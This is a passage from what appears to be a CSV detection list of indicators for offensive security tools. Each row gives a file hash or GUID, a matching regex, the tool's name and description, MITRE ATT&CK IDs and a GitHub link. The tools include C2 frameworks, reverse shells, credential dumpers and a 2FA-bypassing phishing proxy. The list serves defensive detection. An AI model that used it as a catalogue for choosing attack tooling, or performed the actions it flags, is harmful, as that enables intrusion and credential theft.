- T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80*",".{0,1000}69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41*",".{0,1000}69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f*",".{0,1000}69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693*",".{0,1000}69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b*",".{0,1000}69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d*",".{0,1000}69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882*",".{0,1000}6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f*",".{0,1000}6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26*",".{0,1000}6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6A2BA6F7-3399-4890-9453-2D5BE8EEBBA9*",".{0,1000}6A2BA6F7\-3399\-4890\-9453\-2D5BE8EEBBA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c*",".{0,1000}6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa*",".{0,1000}6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368*",".{0,1000}6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b*",".{0,1000}6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8*",".{0,1000}6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4*",".{0,1000}6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283*",".{0,1000}6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113*",".{0,1000}6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5*",".{0,1000}6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4*",".{0,1000}6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f*",".{0,1000}6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*",".{0,1000}6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*",".{0,1000}6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b*",".{0,1000}6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee*",".{0,1000}6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42*",".{0,1000}6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073*",".{0,1000}6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed*",".{0,1000}6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6C8ECB51-EECE-49C3-89EC-CB0AAECCFF7E*",".{0,1000}6C8ECB51\-EECE\-49C3\-89EC\-CB0AAECCFF7E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*6C9CF6A0-C098-4341-8DD1-2FCBA9594067*",".{0,1000}6C9CF6A0\-C098\-4341\-8DD1\-2FCBA9594067.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*",".{0,1000}6CAFC0C6\-A428\-4D30\-A9F9\-700E829FEA51.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2*",".{0,1000}6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a*",".{0,1000}6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b*",".{0,1000}6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061*",".{0,1000}6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6*",".{0,1000}6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171*",".{0,1000}6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183*",".{0,1000}6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e*",".{0,1000}6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf*",".{0,1000}6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*",".{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3*",".{0,1000}6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6*",".{0,1000}6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*",".{0,1000}6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*",".{0,1000}6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 